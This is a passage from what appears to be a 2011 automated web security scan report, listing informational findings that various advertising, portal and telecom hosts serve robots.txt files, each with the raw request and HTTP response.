Content-Type: text/plain; charset=utf-8

User-agent: Googlebot
Disallow: /xml/

User-agent: *
Disallow: /xml/

Sitemap: http://realestate.yahoo.com/sitemap.xml

22.57. http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /1033846/mmna_i_likeable_300x250.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 12:29:53 GMT
Expires: Wed, 07 Sep 2011 12:29:53 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

22.58. http://search.keywordblocks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.keywordblocks.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.keywordblocks.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:23 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 25 Aug 2011 15:47:27 GMT
Accept-Ranges: bytes
Content-Length: 217
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt to block all bots except bots from Google , MSN , Yahoo
User-agent: Googlebot
Disallow:
User-agent: Slurp
Disallow:
User-agent: MSNBot
Disallow:
User-agent: ia_archiver
Disallow:
User-age
...[SNIP]...

22.59. http://search.yahoo.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 24 Aug 2011 19:22:59 GMT
Accept-Ranges: bytes
Content-Length: 82
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /search
Disallow: /bin
Disallow: /language
Disallow: /yhs

22.60. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:24 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.61. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sensor2.suitesmart.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Feb 2011 01:37:19 GMT
ETag: "1f003b-1a-49c70702b51c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.62. http://serviceo.comcast.net/b/ss/comcastdotcomprod/1/H.22.1/s91887737833894

Summary

Severity:   Information
Confidence:   Certain
Host:   http://serviceo.comcast.net
Path:   /b/ss/comcastdotcomprod/1/H.22.1/s91887737833894

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: serviceo.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:42 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "27e01b-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www431
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.63. http://servicetips.whitefence.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://servicetips.whitefence.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: servicetips.whitefence.com

Response

HTTP/1.0 200 OK
Content-Type: text/html
ETag: "76397c94314f7a16f0d5d15c36c5b58db47df1ee"
Server: TornadoServer/0.1
Date: Tue, 06 Sep 2011 11:59:35 GMT
Content-Length: 79
Connection: close

User-agent: *
Disallow:
Sitemap: http://servicetips.whitefence.com/sitemap.xml

22.64. http://shopping.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: shopping.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 16 Sep 2010 00:55:27 GMT
Accept-Ranges: bytes
Content-Length: 265
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: googlebot
Disallow: /search


User-agent: slurp
Disallow: /search


User-agent: *
Disallow: /search
Disallow: /stores/

User-agent: msnbot
Disallow: /search

User-agent: bingbot
Disallow
...[SNIP]...

22.65. http://show.partners-z.com/s/show

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /s/show

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: show.partners-z.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:55 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 06 Jul 2011 19:16:40 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.66. http://sitesearch.comcast.com/static.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /static.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sitesearch.comcast.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:13 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 10 Aug 2011 17:12:43 GMT
ETag: "406e11-398-c9ced8c0"
Accept-Ranges: bytes
Content-Length: 920
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /connectyourfreewii
Disallow: /About/PressRelease/PressReleaseDetail.ashx?PRID=305
Disallow: /About/PressRelease/PressReleaseD
...[SNIP]...

22.67. http://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_BTBS_Dante_Yh1k.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Thu, 08 Sep 2011 04:57:13 GMT
Date: Tue, 06 Sep 2011 12:45:04 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

22.68. http://speed.pointroll.com/PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/Apple/891280/dg2_300x250.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:14 GMT
Connection: close

User-agent: *
Disallow: /

22.69. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Tue, 06 Sep 2011 11:59:41 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.70. http://support.aptela.com:9000/tools/ResetPassword.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.aptela.com:9000
Path:   /tools/ResetPassword.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: support.aptela.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:50 GMT
Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.20 PHP/5.1.2 mod_ssl/2.0.55 OpenSSL/0.9.8a
Last-Modified: Tue, 18 Dec 2007 15:42:59 GMT
ETag: "8d24c0e-1a-621d66c0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.71. http://t.invitemedia.com/track_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.72. http://t.pointroll.com/PointRoll/Track/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /PointRoll/Track/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:575"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 12:49:35 GMT
Connection: close

User-agent: *
Disallow: /

22.73. http://tags.mathtag.com/view/js/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mathtag.com
Path:   /view/js/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tags.mathtag.com

Response

HTTP/1.1 200 OK
x-mm-host: pao-bidder-x8
Server: MMBD/3.5.14.3
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:44:55 GMT
Connection: close
Content-Length: 25

User-agent: *
Disallow: /

22.74. http://themes.googleusercontent.com/static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /static/fonts/ubuntu/v1/_xyN3apAT_yRRDeqB3sPRg.woff

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:02:35 GMT
Expires: Tue, 06 Sep 2011 12:02:35 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

22.75. http://udmserve.net/udm/img.fetch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: udmserve.net

Response

HTTP/1.0 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3074352879"
Last-Modified: Wed, 04 May 2011 06:13:47 GMT
Content-Length: 26
Connection: keep-alive
Date: Tue, 06 Sep 2011 12:45:58 GMT
Server: lighttpd/1.4.28

User-Agent: *
Disallow: /

22.76. http://us.bc.yahoo.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.bc.yahoo.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.bc.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:29:49 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

22.77. http://utdi.reachlocal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: utdi.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 26
Keep-Alive: timeout=12, max=85
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

User-agent: *
Disallow: /

22.78. http://utdi.reachlocal.net/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: utdi.reachlocal.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:08 GMT
Server: Apache
Last-Modified: Tue, 16 Feb 2010 23:59:27 GMT
ETag: "1c-47fc08617d5c0"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=12, max=79
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

User-agent: *
Disallow: /

22.79. http://video.music.yahoo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.music.yahoo.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: video.music.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Tue, 19 Feb 2008 21:32:31 GMT
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

22.80. http://whitefence.112.2o7.net/b/ss/pcwhitefencecom/1/H.21/s91730218948796

Summary

Severity:   Information
Confidence:   Certain
Host:   http://whitefence.112.2o7.net
Path:   /b/ss/pcwhitefencecom/1/H.21/s91730218948796

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: whitefence.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "3514c-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www164
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.81. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adfusion.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 16 Aug 2011 14:41:28 GMT
Accept-Ranges: bytes
ETag: "16c1e294225ccc1:244b"
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:44:58 GMT
Connection: close

User-agent: *
Disallow:

22.82. http://www.aptela.com/lp2011/T2V1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aptela.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 19:07:26 GMT
ETag: "1c6c00e-4e-671c1780"
Accept-Ranges: bytes
Content-Length: 78
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cgi-bin/
Sitemap: http://www.aptela.com/sitemap.xml

22.83. http://www.burstnet.com/enlightn/8117/3E06/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117/3E06/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 09 Mar 1999 03:20:24 GMT
ETag: "596a48-1a-36e49378"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:55:53 GMT
Connection: close

User-agent: *
Disallow: /

22.84. http://www.comcast.com/shop/buyflow/default.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /shop/buyflow/default.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.com

Response

HTTP/1.1 200 OK
Content-Length: 1344
Content-Type: text/plain
Last-Modified: Fri, 02 Sep 2011 18:34:52 GMT
Accept-Ranges: bytes
ETag: "bd03619f69cc1:1343"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 11:59:16 GMT
Connection: close

# Comcast
# robots.txt for http://www.comcast.com
# Created on 2011-06-16 by IPQ-ED
# Edited on 2011-08-24 by IPQ-ED
# Edited on 2011-08-24 by CMC-JS


# Disallow all crawlers access to certa
...[SNIP]...

22.85. https://www.comcast.com/Localization/Localize.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.com

Response

HTTP/1.1 200 OK
Content-Length: 1344
Content-Type: text/plain
Last-Modified: Fri, 02 Sep 2011 18:34:52 GMT
Accept-Ranges: bytes
ETag: "bd03619f69cc1:1343"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 11:59:21 GMT
Connection: close
Vary: Accept-Encoding

# Comcast
# robots.txt for http://www.comcast.com
# Created on 2011-06-16 by IPQ-ED
# Edited on 2011-08-24 by IPQ-ED
# Edited on 2011-08-24 by CMC-JS


# Disallow all crawlers access to certa
...[SNIP]...

22.86. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.42.46
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.87. http://www.frontier.com/yahoo/fy_excl2.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frontier.com

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:29:54 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /


22.88. https://www.frontier.com/AgentOrdering/Login/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frontier.com

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:27:16 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /


22.89. http://www.google-analytics.com/siteopt.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /siteopt.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Tue, 06 Sep 2011 11:52:02 GMT
Expires: Tue, 06 Sep 2011 11:52:02 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

22.90. http://www.googleadservices.com/pagead/aclk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Tue, 06 Sep 2011 05:52:07 GMT
Date: Tue, 06 Sep 2011 11:50:38 GMT
Expires: Tue, 06 Sep 2011 11:50:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.91. http://www.myfitv.com/portal/recent_tv_elastic

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /portal/recent_tv_elastic

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfitv.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:29:52 GMT
ETag: "3efa1-cc-4813dbc3dd680"
Last-Modified: Sun, 07 Mar 2010 22:47:38 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Vary: Accept-Encoding
Content-Length: 204
Connection: Close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

22.92. http://www.ooma.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ooma.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:04 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "110030-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 11:52:04 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

22.93. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.optionshouse.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:04 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 98
Last-Modified: Fri, 02 Sep 2011 00:23:30 GMT

User-agent: *
Sitemap: http://www.optionshouse.com/sitemap.xml
Disallow: /pleaseUpgradeYourBrowser

22.94. http://www.pgatour.com/.element/ssi/ads/2.0/gdyn_pgatour.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pgatour.com
Path:   /.element/ssi/ads/2.0/gdyn_pgatour.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pgatour.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:28 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 327
Content-Type: text/plain
Connection: close

User-Agent: *
Disallow: /.dev
Disallow: /.element
Disallow: /microsites
Disallow: /live-video/demo
Disallow: /pgatour_adspaces
Disallow: /tmp
Disallow: /video/video
Disallow: /video/audio
Dis
...[SNIP]...

22.95. https://www.usps.com/tools/domesticratecalc/welcome.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /tools/domesticratecalc/welcome.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.usps.com

Response

HTTP/1.0 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/plain
ETag: "5f1c9daa-15c4-0-22"
Last-Modified: Mon, 15 Aug 2011 19:53:03 GMT
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:06 GMT
Content-Length: 34
Connection: close

User-agent: *
Disallow: /judicial/

22.96. http://www.vonage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:08 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 14:14:58 GMT
ETag: "6c8617-283-4930d08c79c80"
Accept-Ranges: bytes
Content-Length: 643
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /emails/lnp1/1/
Disallow: /emails/lnp1/2/
Disallow: /emails/lnp1/3/
Disallow: /emails/lnp1/4/
Disallow: /emails/lnp1/5/
Disallow: /emails/lnp1/6/
Disallow: /emails/lnp1/
...[SNIP]...

22.97. http://www.whitefence.com/category/home-phone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.whitefence.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:57 GMT
Server: Apache
Vary: *
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 11:51:57 GMT
Last-Modified: Thu, 21 Apr 2011 19:12:05 GMT
ETag: "199a45-6e-4db08185"
Accept-Ranges: bytes
Content-Length: 110
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /test/
Disallow: /common/
Disallow: /objects/
Disallow: /scripts/
Disallow: /static/


22.98. http://www.zillow.com/app

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /app

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.zillow.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Cache-Control: max-age=1209600
Expires: Tue, 20 Sep 2011 12:45:20 GMT
ETag: W/"987-1314817478000"
